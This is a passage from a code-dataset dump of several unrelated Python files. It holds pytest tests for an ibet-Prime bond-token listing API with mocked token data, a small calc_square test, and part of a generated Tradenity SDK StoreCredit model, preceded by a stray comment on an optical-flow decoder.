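# --- Illustrative sketch of the per-scale refinement step ---
# Every decoder stage in the forward passes above follows the same recipe:
# predict flow at the coarse scale, upsample both the flow and the decoder
# features, crop them to the next-finer encoder feature, and concatenate.
# Schematically (names here are generic, not taken from the file):
#
#   flow_k  = predict_flow_k(feat_k)                      # 2-channel flow map
#   flow_up = crop_like(upsample_k(flow_k), enc_finer)    # match spatial size
#   dec_up  = crop_like(deconv_k(feat_k), enc_finer)
#   feat_k1 = torch.cat((enc_finer, dec_up, flow_up), 1)  # next-finer input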
| [per-file quality-signal columns]
| hexsha: 3e7242c68c16813170d82309e047333d3745e304 | size: 30,720 | ext: py | lang: Python
| repo: BoostryJP/ibet-Prime @ 924e7f8da4f8feea0a572e8b5532e09bcdf2dc99 | path: tests/test_app_routers_bond_tokens_GET.py | licenses: ["Apache-2.0"]
| stars: 2 (2021-08-19T12:35:25.000Z – 2022-02-16T04:13:38.000Z) | issues: 46 (2021-09-02T03:22:05.000Z – 2022-03-31T09:20:00.000Z) | forks: 1 (2021-11-17T23:18:27.000Z – 2021-11-17T23:18:27.000Z)
| content:
"""
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import pytz
from unittest import mock
from unittest.mock import call
from app.model.blockchain import IbetStraightBondContract
from app.model.db import (
Token,
TokenType,
AdditionalTokenInfo
)
from config import TZ
from tests.account_config import config_eth_account
class TestAppRoutersBondTokensGET:
# target API endpoint
apiurl = "/bond/tokens"
local_tz = pytz.timezone(TZ)
###########################################################################
# Normal Case
###########################################################################
# <Normal Case 1>
# parameter unset address, 0 Record
def test_normal_1(self, client, db):
resp = client.get(self.apiurl)
assert resp.status_code == 200
assert resp.json() == []
# <Normal Case 2>
# parameter unset address, 1 Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_2(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
token = Token()
token.type = TokenType.IBET_STRAIGHT_BOND
token.tx_hash = "tx_hash_test1"
token.issuer_address = issuer_address_1
token.token_address = "token_address_test1"
token.abi = "abi_test1"
db.add(token)
db.commit()
_issue_datetime = pytz.timezone("UTC").localize(token.created).astimezone(self.local_tz).isoformat()
mock_token = IbetStraightBondContract()
mock_token.issuer_address = token.issuer_address
mock_token.token_address = token.token_address
mock_token.name = "testtoken1"
mock_token.symbol = "test1"
mock_token.total_supply = 10000
mock_token.contact_information = "contactInformation_test1"
mock_token.privacy_policy = "privacyPolicy_test1"
mock_token.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token.status = True
mock_token.face_value = 200
mock_token.redemption_date = "redemptionDate_test1"
mock_token.redemption_value = 40
mock_token.return_date = "returnDate_test1"
mock_token.return_amount = "returnAmount_test1"
mock_token.purpose = "purpose_test1"
mock_token.interest_rate = 0.003
mock_token.transferable = True
mock_token.is_offering = False
mock_token.is_redeemed = False
mock_token.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token.transfer_approval_required = True
mock_token.memo = "memo_test1"
mock_get.side_effect = [
mock_token
]
resp = client.get(self.apiurl)
# assertion mock call arguments
mock_get.assert_any_call(contract_address=token.token_address)
assumed_response = [
{
"issuer_address": token.issuer_address,
"token_address": token.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": False,
"memo": "memo_test1",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
# <Normal Case 3>
# parameter unset address, Multi Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_3(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
# 1st Data
token_1 = Token()
token_1.type = TokenType.IBET_STRAIGHT_BOND
token_1.tx_hash = "tx_hash_test1"
token_1.issuer_address = issuer_address_1
token_1.token_address = "token_address_test1"
token_1.abi = "abi_test1"
db.add(token_1)
db.commit()
_issue_datetime_1 = pytz.timezone("UTC").localize(token_1.created).astimezone(self.local_tz).isoformat()
additional_info_1 = AdditionalTokenInfo()
additional_info_1.token_address = "token_address_test1"
additional_info_1.is_manual_transfer_approval = True
db.add(additional_info_1)
db.commit()
mock_token_1 = IbetStraightBondContract()
mock_token_1.issuer_address = token_1.issuer_address
mock_token_1.token_address = token_1.token_address
mock_token_1.name = "testtoken1"
mock_token_1.symbol = "test1"
mock_token_1.total_supply = 10000
mock_token_1.contact_information = "contactInformation_test1"
mock_token_1.privacy_policy = "privacyPolicy_test1"
mock_token_1.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token_1.status = True
mock_token_1.face_value = 200
mock_token_1.redemption_date = "redemptionDate_test1"
mock_token_1.redemption_value = 40
mock_token_1.return_date = "returnDate_test1"
mock_token_1.return_amount = "returnAmount_test1"
mock_token_1.purpose = "purpose_test1"
mock_token_1.interest_rate = 0.003
mock_token_1.transferable = True
mock_token_1.is_offering = False
mock_token_1.is_redeemed = False
mock_token_1.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token_1.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token_1.transfer_approval_required = True
mock_token_1.memo = "memo_test1"
# 2nd Data
token_2 = Token()
token_2.type = TokenType.IBET_STRAIGHT_BOND
token_2.tx_hash = "tx_hash_test2"
token_2.issuer_address = issuer_address_2
token_2.token_address = "token_address_test2"
token_2.abi = "abi_test2"
token_2.token_status = 0
db.add(token_2)
db.commit()
_issue_datetime_2 = pytz.timezone("UTC").localize(token_2.created).astimezone(self.local_tz).isoformat()
additional_info_2 = AdditionalTokenInfo()
additional_info_2.token_address = "token_address_test2"
additional_info_2.is_manual_transfer_approval = None # not target
db.add(additional_info_2)
db.commit()
mock_token_2 = IbetStraightBondContract()
mock_token_2.issuer_address = token_2.issuer_address
mock_token_2.token_address = token_2.token_address
mock_token_2.name = "testtoken2"
mock_token_2.symbol = "test2"
mock_token_2.total_supply = 50000
mock_token_2.contact_information = "contactInformation_test2"
mock_token_2.privacy_policy = "privacyPolicy_test2"
mock_token_2.tradable_exchange_contract_address = "0x1234567890AbcdfE1234567890abcdfE12345680"
mock_token_2.status = True
mock_token_2.face_value = 600
mock_token_2.redemption_date = "redemptionDate_test2"
mock_token_2.redemption_value = 80
mock_token_2.return_date = "returnDate_test2"
mock_token_2.return_amount = "returnAmount_test2"
mock_token_2.purpose = "purpose_test2"
mock_token_2.interest_rate = 0.007
mock_token_2.transferable = False
mock_token_2.is_offering = False
mock_token_2.is_redeemed = False
mock_token_2.personal_info_contract_address = "0x1234567890abcdFE1234567890ABcdfE12345681"
mock_token_2.interest_payment_date = [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
]
mock_token_2.transfer_approval_required = False
mock_token_2.memo = "memo_test2"
mock_get.side_effect = [
mock_token_1, mock_token_2
]
resp = client.get(self.apiurl)
# assertion mock call arguments
mock_get.assert_has_calls(
[call(contract_address=token_1.token_address), call(contract_address=token_2.token_address)])
assumed_response = [
{
"issuer_address": token_1.issuer_address,
"token_address": token_1.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime_1,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": True,
"memo": "memo_test1",
},
{
"issuer_address": token_2.issuer_address,
"token_address": token_2.token_address,
"name": "testtoken2",
"symbol": "test2",
"total_supply": 50000,
"contact_information": "contactInformation_test2",
"privacy_policy": "privacyPolicy_test2",
"tradable_exchange_contract_address": "0x1234567890AbcdfE1234567890abcdfE12345680",
"status": True,
"face_value": 600,
"redemption_date": "redemptionDate_test2",
"redemption_value": 80,
"return_date": "returnDate_test2",
"return_amount": "returnAmount_test2",
"purpose": "purpose_test2",
"interest_rate": 0.007,
"transferable": False,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890abcdFE1234567890ABcdfE12345681",
"interest_payment_date": [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
],
"issue_datetime": _issue_datetime_2,
"token_status": 0,
"transfer_approval_required": False,
"is_manual_transfer_approval": False,
"memo": "memo_test2",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
# <Normal Case 4>
# parameter set address, 0 Record
def test_normal_4(self, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
# No Target Data
token = Token()
token.type = TokenType.IBET_STRAIGHT_BOND
token.tx_hash = "tx_hash_test1"
token.issuer_address = issuer_address_1
token.token_address = "token_address_test1"
token.abi = "abi_test1"
db.add(token)
resp = client.get(self.apiurl, headers={"issuer-address": issuer_address_2})
assert resp.status_code == 200
assert resp.json() == []
# <Normal Case 5>
# parameter set address, 1 Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_5(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
token_1 = Token()
token_1.type = TokenType.IBET_STRAIGHT_BOND
token_1.tx_hash = "tx_hash_test1"
token_1.issuer_address = issuer_address_1
token_1.token_address = "token_address_test1"
token_1.abi = "abi_test1"
db.add(token_1)
db.commit()
_issue_datetime = pytz.timezone("UTC").localize(token_1.created).astimezone(self.local_tz).isoformat()
mock_token = IbetStraightBondContract()
mock_token.issuer_address = token_1.issuer_address
mock_token.token_address = token_1.token_address
mock_token.name = "testtoken1"
mock_token.symbol = "test1"
mock_token.total_supply = 10000
mock_token.contact_information = "contactInformation_test1"
mock_token.privacy_policy = "privacyPolicy_test1"
mock_token.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token.status = True
mock_token.face_value = 200
mock_token.redemption_date = "redemptionDate_test1"
mock_token.redemption_value = 40
mock_token.return_date = "returnDate_test1"
mock_token.return_amount = "returnAmount_test1"
mock_token.purpose = "purpose_test1"
mock_token.interest_rate = 0.003
mock_token.transferable = True
mock_token.is_offering = False
mock_token.is_redeemed = False
mock_token.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token.transfer_approval_required = True
mock_token.memo = "memo_test1"
mock_get.side_effect = [
mock_token
]
# No Target Data
token_2 = Token()
token_2.type = TokenType.IBET_STRAIGHT_BOND
token_2.tx_hash = "tx_hash_test1"
token_2.issuer_address = issuer_address_2
token_2.token_address = "token_address_test1"
token_2.abi = "abi_test1"
db.add(token_2)
resp = client.get(self.apiurl, headers={"issuer-address": issuer_address_1})
# assertion mock call arguments
mock_get.assert_any_call(contract_address=token_1.token_address)
assumed_response = [
{
"issuer_address": token_1.issuer_address,
"token_address": token_1.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": False,
"memo": "memo_test1",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
# <Normal Case 6>
# parameter set address, Multi Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_6(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
# 1st Data
token_1 = Token()
token_1.type = TokenType.IBET_STRAIGHT_BOND
token_1.tx_hash = "tx_hash_test1"
token_1.issuer_address = issuer_address_1
token_1.token_address = "token_address_test1"
token_1.abi = "abi_test1"
db.add(token_1)
db.commit()
_issue_datetime_1 = pytz.timezone("UTC").localize(token_1.created).astimezone(self.local_tz).isoformat()
mock_token_1 = IbetStraightBondContract()
mock_token_1.issuer_address = token_1.issuer_address
mock_token_1.token_address = token_1.token_address
mock_token_1.name = "testtoken1"
mock_token_1.symbol = "test1"
mock_token_1.total_supply = 10000
mock_token_1.contact_information = "contactInformation_test1"
mock_token_1.privacy_policy = "privacyPolicy_test1"
mock_token_1.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token_1.status = True
mock_token_1.face_value = 200
mock_token_1.redemption_date = "redemptionDate_test1"
mock_token_1.redemption_value = 40
mock_token_1.return_date = "returnDate_test1"
mock_token_1.return_amount = "returnAmount_test1"
mock_token_1.purpose = "purpose_test1"
mock_token_1.interest_rate = 0.003
mock_token_1.transferable = True
mock_token_1.is_offering = False
mock_token_1.is_redeemed = False
mock_token_1.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token_1.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token_1.transfer_approval_required = True
mock_token_1.memo = "memo_test1"
# 2nd Data
token_2 = Token()
token_2.type = TokenType.IBET_STRAIGHT_BOND
token_2.tx_hash = "tx_hash_test2"
token_2.issuer_address = issuer_address_1
token_2.token_address = "token_address_test2"
token_2.abi = "abi_test2"
token_2.token_status = 0
db.add(token_2)
db.commit()
_issue_datetime_2 = pytz.timezone("UTC").localize(token_2.created).astimezone(self.local_tz).isoformat()
mock_token_2 = IbetStraightBondContract()
mock_token_2.issuer_address = token_2.issuer_address
mock_token_2.token_address = token_2.token_address
mock_token_2.name = "testtoken2"
mock_token_2.symbol = "test2"
mock_token_2.total_supply = 50000
mock_token_2.contact_information = "contactInformation_test2"
mock_token_2.privacy_policy = "privacyPolicy_test2"
mock_token_2.tradable_exchange_contract_address = "0x1234567890AbcdfE1234567890abcdfE12345680"
mock_token_2.status = True
mock_token_2.face_value = 600
mock_token_2.redemption_date = "redemptionDate_test2"
mock_token_2.redemption_value = 80
mock_token_2.return_date = "returnDate_test2"
mock_token_2.return_amount = "returnAmount_test2"
mock_token_2.purpose = "purpose_test2"
mock_token_2.interest_rate = 0.007
mock_token_2.transferable = False
mock_token_2.is_offering = False
mock_token_2.is_redeemed = False
mock_token_2.personal_info_contract_address = "0x1234567890abcdFE1234567890ABcdfE12345681"
mock_token_2.interest_payment_date = [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
]
mock_token_2.transfer_approval_required = False
mock_token_2.memo = "memo_test2"
mock_get.side_effect = [
mock_token_1, mock_token_2
]
# No Target Data
token_3 = Token()
token_3.type = TokenType.IBET_STRAIGHT_BOND
token_3.tx_hash = "tx_hash_test1"
token_3.issuer_address = issuer_address_2
token_3.token_address = "token_address_test1"
token_3.abi = "abi_test1"
db.add(token_3)
resp = client.get(self.apiurl, headers={"issuer-address": issuer_address_1})
# assertion mock call arguments
mock_get.assert_has_calls(
[call(contract_address=token_1.token_address), call(contract_address=token_2.token_address)])
assumed_response = [
{
"issuer_address": issuer_address_1,
"token_address": token_1.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime_1,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": False,
"memo": "memo_test1",
},
{
"issuer_address": issuer_address_1,
"token_address": token_2.token_address,
"name": "testtoken2",
"symbol": "test2",
"total_supply": 50000,
"contact_information": "contactInformation_test2",
"privacy_policy": "privacyPolicy_test2",
"tradable_exchange_contract_address": "0x1234567890AbcdfE1234567890abcdfE12345680",
"status": True,
"face_value": 600,
"redemption_date": "redemptionDate_test2",
"redemption_value": 80,
"return_date": "returnDate_test2",
"return_amount": "returnAmount_test2",
"purpose": "purpose_test2",
"interest_rate": 0.007,
"transferable": False,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890abcdFE1234567890ABcdfE12345681",
"interest_payment_date": [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
],
"issue_datetime": _issue_datetime_2,
"token_status": 0,
"transfer_approval_required": False,
"is_manual_transfer_approval": False,
"memo": "memo_test2",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
###########################################################################
# Error Case
###########################################################################
# <Error_1>
# parameter error
def test_error_1(self, client, db):
resp = client.get(self.apiurl, headers={"issuer-address": "issuer_address"})
assert resp.status_code == 422
assert resp.json() == {
"meta": {
"code": 1,
"title": "RequestValidationError"
},
"detail": [{
"loc": ["header", "issuer-address"],
"msg": "issuer-address is not a valid address",
"type": "value_error"
}]
}
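# --- Running this suite (illustrative) ---
# The tests rely on pytest fixtures `client` (an HTTP test client) and `db`
# (a database session) that the project's conftest.py is assumed to provide.
# A typical invocation might be:
#
#   pytest tests/test_app_routers_bond_tokens_GET.py -v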
| [per-file quality-signal columns]
| hexsha: 3e842bee8dca1ee70ccb3b6cc5b787670e3c9dda | size: 144 | ext: py | lang: Python
| repo: cehbrecht/quick-sphinx-tutorial @ 6a855e3d1c5d072951bf775bdfdf85388eba5df8 | path: giza/tests/test_giza.py | licenses: ["Apache-2.0"]
| stars: 2 (2016-04-20T22:03:57.000Z – 2016-06-14T18:54:54.000Z) | issues: null | forks: 11 (2018-02-01T23:42:12.000Z – 2021-04-28T04:02:29.000Z)
| content:
from giza import calc_square
def test_calc_square():
assert calc_square(2, verbosity=0) == 4
assert calc_square(4, verbosity=1) == 16
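# --- Hypothetical implementation under test (sketch) ---
# The test above only pins down calc_square's contract: square the input and
# accept a `verbosity` keyword. A minimal version consistent with both
# assertions might look like this (not the package's actual code):
#
#   def calc_square(n, verbosity=0):
#       if verbosity > 0:
#           print(f"squaring {n}")
#       return n * n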
| [per-file quality-signal columns]
| hexsha: 903cc5e695d6564223090266b16341d9860cc5b6 | size: 29,537 | ext: py | lang: Python
| repo: tradenity/python-sdk @ d13fbe23f4d6ff22554c6d8d2deaf209371adaf1 | path: tradenity/resources/store_credit.py | licenses: ["Apache-2.0"]
| stars: 1 (2020-03-19T04:09:17.000Z – 2020-03-19T04:09:17.000Z) | issues: null | forks: null
| content:
# coding: utf-8
"""
Tradenity API
Tradenity eCommerce Rest API
Contact: support@tradenity.com
"""
from __future__ import absolute_import
import re
import pprint
# python 2 and python 3 compatibility library
import six
from tradenity.api_client import ApiClient
class StoreCredit(object):
swagger_types = {
'id': 'str',
'meta': 'InstanceMeta',
'amount': 'int',
'customer': 'Customer',
'currency': 'Currency',
'transactions': 'list[Transaction]'
}
attribute_map = {
'id': 'id',
'meta': '__meta',
'amount': 'amount',
'customer': 'customer',
'currency': 'currency',
'transactions': 'transactions'
}
api_client = None
def __init__(self, id=None, meta=None, amount=None, customer=None, currency=None, transactions=None):
"""StoreCredit - a model defined in Swagger"""
self._id = id
self._meta = None
self._amount = None
self._customer = None
self._currency = None
self._transactions = None
self.discriminator = None
if meta is not None:
self.meta = meta
if amount is not None:
self.amount = amount
self.customer = customer
self.currency = currency
if transactions is not None:
self.transactions = transactions
@property
def id(self):
if self._id:
return self._id
elif self.meta is None:
return None
else:
self._id = self.meta.href.split("/")[-1]
return self._id
@id.setter
def id(self, new_id):
self._id = new_id
@property
def meta(self):
"""Gets the meta of this StoreCredit.
:return: The meta of this StoreCredit.
:rtype: InstanceMeta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""Sets the meta of this StoreCredit.
:param meta: The meta of this StoreCredit.
:type: InstanceMeta
"""
self._meta = meta
@property
def amount(self):
"""Gets the amount of this StoreCredit.
:return: The amount of this StoreCredit.
:rtype: int
"""
return self._amount
@amount.setter
def amount(self, amount):
"""Sets the amount of this StoreCredit.
:param amount: The amount of this StoreCredit.
:type: int
"""
self._amount = amount
@property
def customer(self):
"""Gets the customer of this StoreCredit.
:return: The customer of this StoreCredit.
:rtype: Customer
"""
return self._customer
@customer.setter
def customer(self, customer):
"""Sets the customer of this StoreCredit.
:param customer: The customer of this StoreCredit.
:type: Customer
"""
self._customer = customer
@property
def currency(self):
"""Gets the currency of this StoreCredit.
:return: The currency of this StoreCredit.
:rtype: Currency
"""
return self._currency
@currency.setter
def currency(self, currency):
"""Sets the currency of this StoreCredit.
:param currency: The currency of this StoreCredit.
:type: Currency
"""
self._currency = currency
@property
def transactions(self):
"""Gets the transactions of this StoreCredit.
:return: The transactions of this StoreCredit.
:rtype: list[Transaction]
"""
return self._transactions
@transactions.setter
def transactions(self, transactions):
"""Sets the transactions of this StoreCredit.
:param transactions: The transactions of this StoreCredit.
:type: list[Transaction]
"""
self._transactions = transactions
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(StoreCredit, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, StoreCredit):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
@classmethod
def get_api_client(cls):
if cls.api_client is None:
cls.api_client = ApiClient.instance()
return cls.api_client
@classmethod
def find_all(cls, **kwargs):
return cls.list_all_store_credits(**kwargs)
@classmethod
def find_all_by(cls, **kwargs):
return cls.list_all_store_credits(**kwargs)
@classmethod
def find_one_by(cls, **kwargs):
results = cls.list_all_store_credits(**kwargs)
if len(results) > 0:
return results[0]
@classmethod
def find_by_id(cls, id):
return cls.get_store_credit_by_id(id)
def create(self):
new_instance = self.create_store_credit(self)
self.id = new_instance.id
return self
def update(self):
return self.update_store_credit_by_id(self.id, self)
def delete(self):
return self.delete_store_credit_by_id(self.id)
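    # --- Illustrative use of the active-record helpers above (sketch) ---
    # Assumes ApiClient.instance() has been configured elsewhere; `customer`
    # and `currency` stand for previously fetched resources (hypothetical):
    #
    #   credit = StoreCredit(amount=500, customer=customer, currency=currency)
    #   credit.create()                      # POST, then adopts the new id
    #   credit.amount = 750
    #   credit.update()                      # PUT by id
    #   same = StoreCredit.find_by_id(credit.id)
    #   credit.delete()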
@classmethod
def create_store_credit(cls, store_credit, **kwargs):
"""Create StoreCredit
Create a new StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_store_credit(store_credit, async=True)
>>> result = thread.get()
:param async bool
:param StoreCredit store_credit: Attributes of storeCredit to create (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._create_store_credit_with_http_info(store_credit, **kwargs)
else:
(data) = cls._create_store_credit_with_http_info(store_credit, **kwargs)
return data
@classmethod
def _create_store_credit_with_http_info(cls, store_credit, **kwargs):
"""Create StoreCredit
Create a new StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_store_credit_with_http_info(store_credit, async=True)
>>> result = thread.get()
:param async bool
:param StoreCredit store_credit: Attributes of storeCredit to create (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit' is set
if ('store_credit' not in params or
